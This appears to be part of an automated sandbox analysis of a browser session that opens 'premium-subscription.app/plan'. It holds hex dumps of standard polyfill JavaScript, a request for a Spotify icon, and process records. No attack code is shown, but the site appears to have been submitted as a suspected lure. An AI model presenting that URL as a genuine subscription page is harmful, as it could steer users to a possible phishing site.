                                                                                                                      2025-01-12 23:23:36 UTC16384INData Raw: 26 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 68 74 6d 6c 66 69 6c 65 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 74 2c 65 3b 48 74 3d 74 74 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 77 72 69 74 65 28 56 74 28 22 22 29 29 2c 74 2e 63 6c 6f 73 65 28 29 3b 76 61 72 20 65 3d 74 2e 70 61 72 65 6e 74 57 69 6e 64 6f 77 2e 4f 62 6a 65 63 74 3b 72 65 74 75 72 6e 20 74 3d 6e 75 6c 6c 2c 65 7d 28 74 74 29 3a 28 28 65 3d 78 28 22 69 66 72 61 6d 65 22 29 29 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 2c 4b 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2c 65 2e 73 72 63 3d 53 74 72 69 6e 67 28 22 6a 61 76 61 73 63 72 69 70 74 3a 22 29 2c 28 74 3d 65 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 29 2e
                                                                                                                      Data Ascii: &new ActiveXObject("htmlfile")}catch(t){}var t,e;Ht=tt?function(t){t.write(Vt("")),t.close();var e=t.parentWindow.Object;return t=null,e}(tt):((e=x("iframe")).style.display="none",Kt.appendChild(e),e.src=String("javascript:"),(t=e.contentWindow.document).
                                                                                                                      2025-01-12 23:23:36 UTC16384INData Raw: 69 6f 6e 28 74 2c 72 29 7b 69 66 28 6e 28 72 2c 74 2c 65 29 29 72 65 74 75 72 6e 20 4e 72 2e 73 74 6f 70 28 74 29 7d 2c 76 6f 69 64 20 30 2c 21 30 2c 21 30 29 2e 72 65 73 75 6c 74 7d 7d 29 2c 4c 74 28 7b 74 61 72 67 65 74 3a 22 4d 61 70 22 2c 73 74 61 74 3a 21 30 7d 2c 7b 67 72 6f 75 70 42 79 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 74 68 69 73 3b 5a 74 28 65 29 3b 76 61 72 20 6e 3d 5a 74 28 72 2e 68 61 73 29 2c 6f 3d 5a 74 28 72 2e 67 65 74 29 2c 69 3d 5a 74 28 72 2e 73 65 74 29 3b 72 65 74 75 72 6e 20 4e 72 28 74 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 61 3d 65 28 74 29 3b 6e 2e 63 61 6c 6c 28 72 2c 61 29 3f 6f 2e 63 61 6c 6c 28 72 2c 61 29 2e 70 75 73 68 28 74 29 3a 69 2e 63 61 6c 6c 28 72 2c 61 2c 5b 74 5d
                                                                                                                      Data Ascii: ion(t,r){if(n(r,t,e))return Nr.stop(t)},void 0,!0,!0).result}}),Lt({target:"Map",stat:!0},{groupBy:function(t,e){var r=new this;Zt(e);var n=Zt(r.has),o=Zt(r.get),i=Zt(r.set);return Nr(t,function(t){var a=e(t);n.call(r,a)?o.call(r,a).push(t):i.call(r,a,[t]
                                                                                                                      2025-01-12 23:23:36 UTC16384INData Raw: 3b 76 61 72 20 65 3d 74 68 69 73 2e 65 78 65 63 28 74 29 3b 69 66 28 6e 75 6c 6c 21 3d 3d 65 26 26 21 79 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 65 67 45 78 70 20 65 78 65 63 20 6d 65 74 68 6f 64 20 72 65 74 75 72 6e 65 64 20 73 6f 6d 65 74 68 69 6e 67 20 6f 74 68 65 72 20 74 68 61 6e 20 61 6e 20 4f 62 6a 65 63 74 20 6f 72 20 6e 75 6c 6c 22 29 3b 72 65 74 75 72 6e 21 21 65 7d 7d 29 3b 76 61 72 20 55 69 3d 71 74 28 22 73 70 65 63 69 65 73 22 29 2c 4d 69 3d 21 6f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 2f 2e 2f 3b 72 65 74 75 72 6e 20 74 2e 65 78 65 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 5b 5d 3b 72 65 74 75 72 6e 20 74 2e 67 72 6f 75 70 73 3d 7b 61 3a 22 37 22 7d 2c 74 7d 2c 22 37 22 21 3d 3d 22 22
                                                                                                                      Data Ascii: ;var e=this.exec(t);if(null!==e&&!y(e))throw new Error("RegExp exec method returned something other than an Object or null");return!!e}});var Ui=qt("species"),Mi=!o(function(){var t=/./;return t.exec=function(){var t=[];return t.groups={a:"7"},t},"7"!==""
                                                                                                                      2025-01-12 23:23:36 UTC16384INData Raw: 22 70 61 64 53 74 61 72 74 22 29 3b 76 61 72 20 78 75 3d 77 75 2e 65 6e 64 3b 4c 74 28 7b 74 61 72 67 65 74 3a 22 53 74 72 69 6e 67 22 2c 70 72 6f 74 6f 3a 21 30 2c 66 6f 72 63 65 64 3a 53 75 7d 2c 7b 70 61 64 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 78 75 28 74 68 69 73 2c 74 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 76 6f 69 64 20 30 29 7d 7d 29 2c 72 65 28 22 53 74 72 69 6e 67 22 2c 22 70 61 64 45 6e 64 22 29 2c 4c 74 28 7b 74 61 72 67 65 74 3a 22 53 74 72 69 6e 67 22 2c 73 74 61 74 3a 21 30 7d 2c 7b 72 61 77 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 67 28 74 2e 72 61 77 29 2c 72 3d 66 74 28 65 2e 6c 65 6e 67 74 68 29 2c 6e 3d 61 72 67 75 6d
                                                                                                                      Data Ascii: "padStart");var xu=wu.end;Lt({target:"String",proto:!0,forced:Su},{padEnd:function(t){return xu(this,t,arguments.length>1?arguments[1]:void 0)}}),re("String","padEnd"),Lt({target:"String",stat:!0},{raw:function(t){for(var e=g(t.raw),r=ft(e.length),n=argum


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      20192.168.2.44977413.32.121.944432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:36 UTC391OUTGET /assets.00/spotify-icon-2048x2048-n3imyp8e.png HTTP/1.1
                                                                                                                      Host: static-00.iconduck.com
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:37 UTC473INHTTP/1.1 200 OK
                                                                                                                      Content-Type: image/png
                                                                                                                      Content-Length: 48672
                                                                                                                      Connection: close
                                                                                                                      Last-Modified: Fri, 03 Sep 2021 11:55:29 GMT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Server: AmazonS3
                                                                                                                      Date: Sun, 12 Jan 2025 16:57:05 GMT
                                                                                                                      ETag: "0aff7d5f2e65dedc9d0c94456c50b5e7"
                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                      Via: 1.1 c60125e7f3465aceafb0abd071a41a36.cloudfront.net (CloudFront)
                                                                                                                      X-Amz-Cf-Pop: FRA60-P1
                                                                                                                      X-Amz-Cf-Id: Mc2UjY-1yD8Csv1-FD3Xn1M7P1m1hOPvNj-2241c8VObSOejUqyPIA==
                                                                                                                      Age: 23192
                                                                                                                      Vary: Origin
                                                                                                                      2025-01-12 23:23:37 UTC15911INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 00 00 00 08 00 08 03 00 00 00 85 79 23 02 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 07 74 49 4d 45 07 e5 02 0b 02 18 06 4f 60 1d f2 00 00 03 00 50 4c 54 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                      Data Ascii: PNGIHDRy#gAMAa cHRMz&u0`:pQ<tIMEO`PLTE
                                                                                                                      2025-01-12 23:23:37 UTC16384INData Raw: ab 9d ba 8f f8 ec bb 15 2b 8e 9c 0e 4f 67 c8 48 4a d8 e9 7f 56 ac 98 3e 66 f4 9b 9d 5a 37 ac 5f bd 62 79 cf 22 2e 04 20 b4 16 1b 6e 32 64 d3 16 1b b2 a8 95 0c 59 b8 d1 83 a0 70 94 f0 ab da b0 7d 8f be 63 c6 cc 9c bf 70 f3 8e a3 17 af 24 31 64 5f fc e5 8b 87 76 6c 5e 3c ff fb 31 63 06 f7 ea d6 b4 61 f9 17 dc 09 40 40 aa e2 fd b7 27 33 64 cb c5 4a 64 49 45 4f 33 64 c1 b4 c2 8b a0 20 79 56 6a d8 b9 c7 98 2f 17 2d db bc e3 9f 53 17 23 63 19 f2 2a 31 ea fa d9 53 7b b6 af 5f 36 77 c2 e8 1e 9d 5f a9 f4 02 01 88 44 57 f1 83 0b 0c d9 11 dd 83 2c a9 ed 0d 86 ac 44 76 26 c8 7f 6a af 5a 2d fa 7d 30 7f c9 de 93 21 61 11 91 d1 89 29 12 83 c5 99 92 13 a3 23 af 84 85 9e 3c b0 7c fe 84 81 dd eb fa 6b 09 40 04 76 95 7f 4d 63 78 3e c3 f7 64 41 aa c9 c9 0c 59 fa c3 97 c0 f2
                                                                                                                      Data Ascii: +OgHJV>fZ7_by". n2dYp}cp$1d_vl^<1ca@@'3dJdIEO3d yVj/-S#c*1S{_6w_DW,Dv&jZ-}0!a)#<|k@vMcx>dAY
                                                                                                                      2025-01-12 23:23:37 UTC16377INData Raw: af 3d f1 8f 81 3d 9a 27 09 4c 27 b5 dd c9 d7 8c 1c ff fe bc 1f b6 ee 53 00 d6 52 9a 2c 95 f6 95 02 d1 16 d8 bc 68 da eb 4f dc 71 d9 d9 3d 5a 35 16 98 9a 3b b3 6d b7 81 57 df 37 66 ca b7 5b 15 80 65 7c 25 95 f7 b0 02 d1 53 ba fa a3 71 23 ae 38 ed f8 a3 9a e7 a4 b9 05 56 91 98 99 7f 44 f7 f3 6e 7a 71 e6 7a 05 60 05 0f 4b e5 f5 51 20 c2 8c 70 28 e8 2f 5d f1 c1 d3 57 f4 6a da 30 3b 23 c5 23 b0 22 77 52 ad ba 8d da f7 bb fb ad 85 c5 fe 60 c8 50 00 a6 65 f4 91 ca 6b be 5b 81 48 31 ca 77 15 ac 59 32 73 f4 2d 67 b5 4b 16 d8 86 b7 d9 99 77 4d fc 61 55 41 51 40 01 98 51 41 be 54 5e fd 19 0a 44 40 d9 e6 a5 73 a6 8e 7b e8 aa d3 da 65 0a ec 28 f9 b0 3e 37 8e 7e 67 ce e2 ed 41 05 60 32 33 ea 4b e5 a5 3d a4 40 b5 18 6b be fa f7 cb 23 af 3f bb 47 ab 7a 02 9b ab d9 f2 84
                                                                                                                      Data Ascii: =='L'SR,hOq=Z5;mW7f[e|%Sq#8VDnzqz`KQ p(/]Wj0;##"wR`Pek[H1wY2s-gKwMaUAQ@QAT^D@s{e(>7~gA`23K=@k#?Gz


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:18:23:12
                                                                                                                      Start date:12/01/2025
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:2
                                                                                                                      Start time:18:23:16
                                                                                                                      Start date:12/01/2025
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1924,i,16657322928032054083,1453101877799842923,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:false

                                                                                                                      Target ID:3
                                                                                                                      Start time:18:23:23
                                                                                                                      Start date:12/01/2025
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://premium-subscription.app/plan"
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      No disassembly